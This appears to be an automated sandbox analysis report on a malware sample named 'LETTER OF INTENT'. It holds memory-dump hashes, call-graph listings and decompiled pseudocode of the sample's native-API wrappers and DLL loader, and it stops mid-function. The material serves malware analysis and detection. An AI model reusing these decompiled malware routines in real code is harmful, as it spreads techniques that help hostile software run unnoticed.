              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d95796befed82945393c9bda4063d719ccd3466613669fcc2f0242d21e8324e3
              • Instruction ID: 30ce9cb670704956c72f9df06f3cf9604c316bfb7b8332193f07d2fdd3807ede
              • Opcode Fuzzy Hash: d95796befed82945393c9bda4063d719ccd3466613669fcc2f0242d21e8324e3
              • Instruction Fuzzy Hash: 06C08C3209F6648BC11012D4600ABB47E9C9B4A216F101810E22E4380BAEA05482CA27
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4292c5143f6e28f55103abda68f10ca5b955a4588953cb8170dac0488064c1a
              • Instruction ID: e4daf3876f60623c8d34ce04ccc052367c7138fd3c5ff65a875f3d8f25b67bfd
              • Opcode Fuzzy Hash: f4292c5143f6e28f55103abda68f10ca5b955a4588953cb8170dac0488064c1a
              • Instruction Fuzzy Hash: 87C08C3A0AF2288AD1049299A80ABB47EDC9B0E346F001810E61E03819AEA0DC42C923
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0704f032564368cd1a00e5a6c37e99f7c2a98d216766fc45cba16ab7b4b9fb75
              • Instruction ID: 543809ae8d8ffcb041bd86476711de8701f8eb00ed81f23407654c509bac02c3
              • Opcode Fuzzy Hash: 0704f032564368cd1a00e5a6c37e99f7c2a98d216766fc45cba16ab7b4b9fb75
              • Instruction Fuzzy Hash: DDC02B1009721C4DC000219B24C8BB83FCC4701704F401C10C72D034D58E508080CC00
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f70895563a01d64c66bca21f87ffb4b3e4207bf4ddea6ee6eae99dbf9aa8513e
              • Instruction ID: 833e0466fda4e9fe7a2b079437c3400001706d03017963561a841ca81bbb1621
              • Opcode Fuzzy Hash: f70895563a01d64c66bca21f87ffb4b3e4207bf4ddea6ee6eae99dbf9aa8513e
              • Instruction Fuzzy Hash: 42B0923A000102AF8741EB40C900C89BAE1BBA9300745C156E2488A130C622C528AB52
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID: A
              • API String ID: 0-3554254475
              • Opcode ID: 09f8c8022ef4bd65128cdef8049bbf32734638390b56d1781fa1b5784b9cd018
              • Instruction ID: 0410d0c886b5216e8fb22904dd4aa66663b2278d4798694e4d06596f19509c04
              • Opcode Fuzzy Hash: 09f8c8022ef4bd65128cdef8049bbf32734638390b56d1781fa1b5784b9cd018
              • Instruction Fuzzy Hash: 0C4131B1E016588BEB5DCF6BDD4068EFAF7AFC8200F14C5BA950DBA254DB7006828F10
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 090f2f8236dfb229833935f16b5c538c41b324205fd007564fe85469e54eae2d
              • Instruction ID: 60c2967bc16651e5864bc9ea58588f61148b37024f3c8b17d908ebe9d6aa5844
              • Opcode Fuzzy Hash: 090f2f8236dfb229833935f16b5c538c41b324205fd007564fe85469e54eae2d
              • Instruction Fuzzy Hash: 37E12930C2175A9ACB10EB64D8506ADB7B5FF99300F518B9AD1497B260EF706EC9CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3df78b5598c97d3834f5b7e3f08e39322e0dd18690d62a1c00cb6e368d5d6afd
              • Instruction ID: 7855ac2abb7024c1436e079da15f76bc23eff82b9b147decbb5d911cf509c881
              • Opcode Fuzzy Hash: 3df78b5598c97d3834f5b7e3f08e39322e0dd18690d62a1c00cb6e368d5d6afd
              • Instruction Fuzzy Hash: A5D10930C2175A9ACB10EB64D8506ADB7B5FF99300F519B9AD1497B260EF706EC9CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c9ab184f3b8757bcabe4aff5ec83b9a90a5ca2183de0bbd9341299a6ef9ae873
              • Instruction ID: e31fdbe844f1bf2c8701327bb67f3923237b5cf8e76dc6232b9c0dd640185083
              • Opcode Fuzzy Hash: c9ab184f3b8757bcabe4aff5ec83b9a90a5ca2183de0bbd9341299a6ef9ae873
              • Instruction Fuzzy Hash: 24D1F930C2175A9ACB10EB64D850A9DB7B5FF99300F51DB9AD1497B260EF706EC9CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1c0727e4cd282ab00c24153fe6cf84b773db38ecac1d29db6d90a253cd5593c3
              • Instruction ID: 55096190c5045ea205cfbb0b87f47a8f523dd7d9d8afff19b75eca4b275c7856
              • Opcode Fuzzy Hash: 1c0727e4cd282ab00c24153fe6cf84b773db38ecac1d29db6d90a253cd5593c3
              • Instruction Fuzzy Hash: 16510B70E11215DFDB44DFAAE881A9DBFB6FB88304F04CD29D1059B264DF745906CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 74a7193e4c937ecc253c1aa90219c00585370db7b58312226f76fe64aa419e2c
              • Instruction ID: f7b1e92ccea6c2199b63df5fdf79452537204fc4ab7b5fb3350c6d1026513e50
              • Opcode Fuzzy Hash: 74a7193e4c937ecc253c1aa90219c00585370db7b58312226f76fe64aa419e2c
              • Instruction Fuzzy Hash: 02418EB1D057548FE75DCF678D5028EFAF3AFC9210F19C0BAD448AA265EB340A868F11
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:8.1%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:3.1%
              Total number of Nodes:678
              Total number of Limit Nodes:76
15610 418ea0 LdrLoadDll 15609->15610 15611 41908a 15610->15611 15612 418ea0 LdrLoadDll 15611->15612 15613 419093 15612->15613 15614 418ea0 LdrLoadDll 15613->15614 15615 41909f 15614->15615 15616 418ea0 LdrLoadDll 15615->15616 15617 4190a8 15616->15617 15618 418ea0 LdrLoadDll 15617->15618 15619 4190b1 15618->15619 15620 418ea0 LdrLoadDll 15619->15620 15621 4190ba 15620->15621 15622 418ea0 LdrLoadDll 15621->15622 15623 4190c3 15622->15623 15624 418ea0 LdrLoadDll 15623->15624 15625 4190cc 15624->15625 15626 418ea0 LdrLoadDll 15625->15626 15627 4190d8 15626->15627 15628 418ea0 LdrLoadDll 15627->15628 15629 4190e1 15628->15629 15630 418ea0 LdrLoadDll 15629->15630 15631 4190ea 15630->15631 15632 418ea0 LdrLoadDll 15631->15632 15633 4190f3 15632->15633 15634 418ea0 LdrLoadDll 15633->15634 15635 4190fc 15634->15635 15636 418ea0 LdrLoadDll 15635->15636 15637 419105 15636->15637 15638 418ea0 LdrLoadDll 15637->15638 15639 419111 15638->15639 15640 418ea0 LdrLoadDll 15639->15640 15641 41911a 15640->15641 15642 418ea0 LdrLoadDll 15641->15642 15643 419123 15642->15643 15644 418ea0 LdrLoadDll 15643->15644 15645 41912c 15644->15645 15646 418ea0 LdrLoadDll 15645->15646 15647 419135 15646->15647 15648 418ea0 LdrLoadDll 15647->15648 15649 41913e 15648->15649 15650 418ea0 LdrLoadDll 15649->15650 15651 41914a 15650->15651 15652 418ea0 LdrLoadDll 15651->15652 15653 419153 15652->15653 15654 418ea0 LdrLoadDll 15653->15654 15655 41915c 15654->15655 15655->15381 15657 4191d0 LdrLoadDll 15656->15657 15658 41814c 15657->15658 15658->15383 15660 419183 15659->15660 15686 418730 15660->15686 15664 4187cc NtAllocateVirtualMemory 15663->15664 15665 4191d0 LdrLoadDll 15663->15665 15664->15540 15665->15664 15667 41b250 15666->15667 15668 41b256 15666->15668 15667->15547 15669 41a260 2 API calls 15668->15669 15670 41b27c 15669->15670 15670->15547 15672 41b305 15671->15672 15675 41b33d 15671->15675 15673 41a260 2 API calls 15672->15673 15674 41b31a 15673->15674 15676 41a090 2 API calls 15674->15676 
15675->15552 15676->15675 15678 413314 15677->15678 15679 41a090 2 API calls 15677->15679 15678->15559 15679->15678 15681 418ebb 15680->15681 15682 413e40 LdrLoadDll 15681->15682 15683 418edb 15682->15683 15684 413e40 LdrLoadDll 15683->15684 15685 418f87 15683->15685 15684->15685 15685->15580 15687 41874c 15686->15687 15688 4191d0 LdrLoadDll 15686->15688 15687->15378 15688->15687 15690 4188fc RtlFreeHeap 15689->15690 15691 4191d0 LdrLoadDll 15689->15691 15690->15388 15691->15690 15693 406e30 15692->15693 15694 406e2b 15692->15694 15695 41a010 2 API calls 15693->15695 15694->15276 15698 406e55 15695->15698 15696 406eb8 15696->15276 15697 418130 LdrLoadDll 15697->15698 15698->15696 15698->15697 15699 406ebe 15698->15699 15703 41a010 2 API calls 15698->15703 15708 418830 15698->15708 15701 406ee4 15699->15701 15702 418830 LdrLoadDll 15699->15702 15701->15276 15704 406ed5 15702->15704 15703->15698 15704->15276 15706 4070fe 15705->15706 15707 418830 LdrLoadDll 15705->15707 15706->15237 15707->15706 15709 4191d0 LdrLoadDll 15708->15709 15710 41884c 15709->15710 15710->15698 15712 409d74 15711->15712 15715 417f00 15712->15715 15714 409dae 15714->15286 15716 417f1c 15715->15716 15717 4191d0 LdrLoadDll 15715->15717 15716->15714 15717->15716 15719 419833 15718->15719 15720 409b30 LdrLoadDll 15719->15720 15721 408a5a 15720->15721 15721->15243 15723 409ea3 15722->15723 15724 409f20 15723->15724 15725 417f00 LdrLoadDll 15723->15725 15724->15250 15725->15724 15727 4191d0 LdrLoadDll 15726->15727 15728 40cf9b 15727->15728 15728->15257 15729 418a40 15728->15729 15730 418a4c 15729->15730 15731 4191d0 LdrLoadDll 15730->15731 15732 418a5f LookupPrivilegeValueW 15731->15732 15732->15254 15734 4191d0 LdrLoadDll 15733->15734 15735 4184ec 15734->15735 15735->15258 15737 40a027 15736->15737 15738 409e80 LdrLoadDll 15737->15738 15739 40a056 15738->15739 15739->15180 15741 40d08a 15740->15741 15749 40d140 15740->15749 15742 409e80 LdrLoadDll 15741->15742 15743 40d0ac 15742->15743 15750 
4181b0 15743->15750 15745 40d0ee 15753 4181f0 15745->15753 15748 418700 2 API calls 15748->15749 15749->15183 15749->15184 15751 4181cc 15750->15751 15752 4191d0 LdrLoadDll 15750->15752 15751->15745 15752->15751 15754 40d134 15753->15754 15755 4191d0 LdrLoadDll 15753->15755 15754->15748 15755->15754 15757 409c91 15756->15757 15758 409c8d 15756->15758 15759 409caa 15757->15759 15760 409cdc 15757->15760 15758->15194 15791 417f40 15759->15791 15761 417f40 LdrLoadDll 15760->15761 15762 409ced 15761->15762 15762->15194 15766 40d1f0 LdrLoadDll 15765->15766 15767 4133b6 15765->15767 15766->15767 15767->15196 15794 407710 15768->15794 15771 407710 8 API calls 15772 4079fa 15771->15772 15774 407a0d 15772->15774 15812 40d460 15772->15812 15774->15198 15776 4191d0 LdrLoadDll 15775->15776 15777 40a762 15776->15777 15778 40d1f0 15777->15778 15779 40d20d 15778->15779 15780 418230 LdrLoadDll 15779->15780 15781 40d24e 15780->15781 15782 40d255 15781->15782 15783 418280 LdrLoadDll 15781->15783 15782->15202 15784 40d27e 15783->15784 15784->15202 15786 4191d0 LdrLoadDll 15785->15786 15787 40a899 15786->15787 15787->15219 15789 4191d0 LdrLoadDll 15788->15789 15790 40a8ec 15789->15790 15790->15223 15792 4191d0 LdrLoadDll 15791->15792 15793 409ccc 15792->15793 15793->15194 15795 406e20 2 API calls 15794->15795 15798 40772a 15794->15798 15795->15798 15796 4079b9 15796->15771 15796->15774 15797 4079af 15799 4070e0 LdrLoadDll 15797->15799 15798->15796 15798->15797 15802 418170 LdrLoadDll 15798->15802 15806 40a900 LdrLoadDll NtClose 15798->15806 15809 418090 LdrLoadDll 15798->15809 15810 418700 LdrLoadDll NtClose 15798->15810 15820 417f80 15798->15820 15823 407540 15798->15823 15835 40d340 15798->15835 15843 418000 15798->15843 15846 418030 15798->15846 15849 4180c0 15798->15849 15852 407310 15798->15852 15868 405ea0 15798->15868 15799->15796 15802->15798 15806->15798 15809->15798 15810->15798 15813 40d485 15812->15813 15814 407120 6 API calls 15813->15814 15816 40d4a9 15814->15816 15815 
40d4b6 15815->15774 15816->15815 15817 413a40 6 API calls 15816->15817 15819 41a090 2 API calls 15816->15819 15956 40d2a0 15816->15956 15817->15816 15819->15816 15821 417f9c 15820->15821 15822 4191d0 LdrLoadDll 15820->15822 15821->15798 15822->15821 15824 407556 15823->15824 15878 417af0 15824->15878 15826 40756f 15831 4076e1 15826->15831 15899 407120 15826->15899 15828 407655 15829 407310 7 API calls 15828->15829 15828->15831 15830 407683 15829->15830 15830->15831 15832 418170 LdrLoadDll 15830->15832 15831->15798 15833 4076b8 15832->15833 15833->15831 15834 418770 LdrLoadDll 15833->15834 15834->15831 15935 417fc0 15835->15935 15839 40d3b1 15839->15798 15841 418700 2 API calls 15842 40d3a5 15841->15842 15842->15798 15844 4191d0 LdrLoadDll 15843->15844 15845 41801c 15844->15845 15845->15798 15847 4191d0 LdrLoadDll 15846->15847 15848 41804c 15847->15848 15848->15798 15850 4191d0 LdrLoadDll 15849->15850 15851 4180dc 15850->15851 15851->15798 15853 407339 15852->15853 15941 407280 15853->15941 15855 40734c 15857 418770 LdrLoadDll 15855->15857 15858 4073d7 15855->15858 15861 4073d2 15855->15861 15949 40d3c0 15855->15949 15857->15855 15858->15798 15859 418700 2 API calls 15860 40740a 15859->15860 15860->15858 15862 417f80 LdrLoadDll 15860->15862 15861->15859 15863 40746f 15862->15863 15863->15858 15864 417fc0 LdrLoadDll 15863->15864 15865 4074d3 15864->15865 15865->15858 15866 413a40 6 API calls 15865->15866 15867 407528 15866->15867 15867->15798 15869 405eea 15868->15869 15870 417f80 LdrLoadDll 15869->15870 15871 405f04 15870->15871 15872 413e40 LdrLoadDll 15871->15872 15877 405fdc 15871->15877 15873 405f58 15872->15873 15874 409d50 LdrLoadDll 15873->15874 15875 405fb7 15874->15875 15876 413e40 LdrLoadDll 15875->15876 15876->15877 15877->15798 15879 41a260 2 API calls 15878->15879 15880 417b07 15879->15880 15906 408160 15880->15906 15882 417b22 15883 417b60 15882->15883 15884 417b49 15882->15884 15886 41a010 2 API calls 15883->15886 15885 41a090 2 API calls 15884->15885 
15887 417b56 15885->15887 15888 417b9a 15886->15888 15887->15826 15889 41a010 2 API calls 15888->15889 15890 417bb3 15889->15890 15896 417e54 15890->15896 15912 41a050 15890->15912 15893 417e40 15894 41a090 2 API calls 15893->15894 15895 417e4a 15894->15895 15895->15826 15897 41a090 2 API calls 15896->15897 15898 417ea9 15897->15898 15898->15826 15900 40721f 15899->15900 15901 407135 15899->15901 15900->15828 15901->15900 15902 413a40 6 API calls 15901->15902 15903 4071a2 15902->15903 15904 41a090 2 API calls 15903->15904 15905 4071c9 15903->15905 15904->15905 15905->15828 15907 408185 15906->15907 15908 409b30 LdrLoadDll 15907->15908 15909 4081b8 15908->15909 15911 4081dd 15909->15911 15915 40b330 15909->15915 15911->15882 15932 4187f0 15912->15932 15916 40b35c 15915->15916 15917 418450 LdrLoadDll 15916->15917 15918 40b375 15917->15918 15919 40b37c 15918->15919 15926 418490 15918->15926 15919->15911 15923 40b3b7 15924 418700 2 API calls 15923->15924 15925 40b3da 15924->15925 15925->15911 15927 4191d0 LdrLoadDll 15926->15927 15928 40b39f 15926->15928 15927->15928 15928->15919 15929 418a80 15928->15929 15930 418a9f 15929->15930 15931 4191d0 LdrLoadDll 15929->15931 15930->15923 15931->15930 15933 4191d0 LdrLoadDll 15932->15933 15934 417e39 15933->15934 15934->15893 15934->15896 15936 4191d0 LdrLoadDll 15935->15936 15937 40d384 15936->15937 15937->15842 15938 418060 15937->15938 15939 4191d0 LdrLoadDll 15938->15939 15940 40d395 15939->15940 15940->15839 15940->15841 15942 407298 15941->15942 15943 409b30 LdrLoadDll 15942->15943 15944 4072b3 15943->15944 15945 413e40 LdrLoadDll 15944->15945 15946 4072c3 15945->15946 15947 4072cc PostThreadMessageW 15946->15947 15948 4072e0 15946->15948 15947->15948 15948->15855 15950 40d3d3 15949->15950 15953 418100 15950->15953 15954 4191d0 LdrLoadDll 15953->15954 15955 40d3fe 15954->15955 15955->15855 15957 40d2b1 15956->15957 15960 40d2f1 15957->15960 15965 418950 15957->15965 15959 40d2f8 15959->15816 15960->15959 15961 418170 
LdrLoadDll 15960->15961 15962 40d30f 15961->15962 15962->15959 15963 418770 LdrLoadDll 15962->15963 15964 40d32e 15963->15964 15964->15816 15966 4191d0 LdrLoadDll 15965->15966 15967 41896f 15966->15967 15967->15960

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 41867a-4186c9 call 4191d0 NtReadFile
              C-Code - Quality: 23%
              			E0041867A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
              				void* _t21;
              				void* _t30;
              				void* _t31;
              				intOrPtr* _t32;
              				void* _t34;
              
              				asm("enter 0x8b55, 0xec");
              				_t16 = _a4;
              				_t32 = _a4 + 0xc48;
              				E004191D0(_t30, _t16, _t32,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
              				_t6 =  &_a40; // 0x413a21
              				_t8 =  &_a32; // 0x413d62
              				_t14 =  &_a8; // 0x413d62
              				_t21 =  *((intOrPtr*)( *_t32))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36,  *_t6, _t31, _t34); // executed
              				return _t21;
              			}









              APIs
              • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: !:A$b=A$b=A
              • API String ID: 2738559852-704622139
              • Opcode ID: e74eab5d3dc584caaafd48ca711e429412a1b28a656d261d904f5a869ae2d219
              • Instruction ID: eaf90a57241168485d11756f66813e809b899221acb9c2be6fe4b713bc006db1
              • Opcode Fuzzy Hash: e74eab5d3dc584caaafd48ca711e429412a1b28a656d261d904f5a869ae2d219
              • Instruction Fuzzy Hash: 6CF0F9B2200109AFDB04CF89CC84EEB77ADAF8C354F058249FE0D97251C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 3 418680-418696 4 41869c-4186c9 NtReadFile 3->4 5 418697 call 4191d0 3->5 5->4
              C-Code - Quality: 37%
              			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
              				void* _t18;
              				void* _t27;
              				intOrPtr* _t28;
              
              				_t13 = _a4;
              				_t28 = _a4 + 0xc48;
              				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
              				_t4 =  &_a40; // 0x413a21
              				_t6 =  &_a32; // 0x413d62
              				_t12 =  &_a8; // 0x413d62
              				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
              				return _t18;
              			}







              APIs
              • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: !:A$b=A$b=A
              • API String ID: 2738559852-704622139
              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
              • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
              • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 361 409b30-409b4c 362 409b54-409b59 361->362 363 409b4f call 41af60 361->363 364 409b5b-409b5e 362->364 365 409b5f-409b6d call 41b380 362->365 363->362 368 409b7d-409b8e call 419710 365->368 369 409b6f-409b7a call 41b600 365->369 374 409b90-409ba4 LdrLoadDll 368->374 375 409ba7-409baa 368->375 369->368 374->375
              C-Code - Quality: 100%
              			E00409B30(void* _a4, intOrPtr _a8) {
              				char* _v8;
              				struct _EXCEPTION_RECORD _v12;
              				struct _OBJDIR_INFORMATION _v16;
              				char _v536;
              				void* _t15;
              				struct _OBJDIR_INFORMATION _t17;
              				struct _OBJDIR_INFORMATION _t18;
              				void* _t30;
              				void* _t31;
              				void* _t32;
              
              				_v8 =  &_v536;
              				_t15 = E0041AF60( &_v12, 0x104, _a8);
              				_t31 = _t30 + 0xc;
              				if(_t15 != 0) {
              					_t17 = E0041B380(__eflags, _v8);
              					_t32 = _t31 + 4;
              					__eflags = _t17;
              					if(_t17 != 0) {
              						E0041B600( &_v12, 0);
              						_t32 = _t32 + 8;
              					}
              					_t18 = E00419710(_v8);
              					_v16 = _t18;
              					__eflags = _t18;
              					if(_t18 == 0) {
              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
              						return _v16;
              					}
              					return _t18;
              				} else {
              					return _t15;
              				}
              			}














              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
              • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
              • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 376 4185cf-418621 call 4191d0 NtCreateFile
              C-Code - Quality: 100%
              			E004185CF(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
              				void* _v117;
              				long _t22;
              				void* _t34;
              
              				_t16 = _a4;
              				_t4 = _t16 + 0xc40; // 0xc40
              				E004191D0(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
              				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
              				return _t22;
              			}







              APIs
              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: c744c7afc01e9d282276df09f92af41eb3f4d62b08c3e966ab54f4516f3022aa
              • Instruction ID: a45b50256b54a778fad488d293ba22f2c53eea2bca465b982bc36a4e90f66ff1
              • Opcode Fuzzy Hash: c744c7afc01e9d282276df09f92af41eb3f4d62b08c3e966ab54f4516f3022aa
              • Instruction Fuzzy Hash: 3F01CFB2200108BFCB18CF99DC95EEB77A9AF8C354F158248FA1DE7241C630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 379 4185d0-4185e6 380 4185ec-418621 NtCreateFile 379->380 381 4185e7 call 4191d0 379->381 381->380
              C-Code - Quality: 100%
              			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
              				long _t21;
              				void* _t31;
              
              				_t3 = _a4 + 0xc40; // 0xc40
              				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
              				return _t21;
              			}






              APIs
              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
              • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
              • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 382 4187aa-4187ed call 4191d0 NtAllocateVirtualMemory
              C-Code - Quality: 53%
              			E004187AA(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
              				long _t14;
              				void* _t21;
              
              				asm("outsb");
              				asm("hlt");
              				asm("sbb ebx, [ebx-0x1374aad3]");
              				_t10 = _a4;
              				_t3 = _t10 + 0xc60; // 0xca0
              				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
              				return _t14;
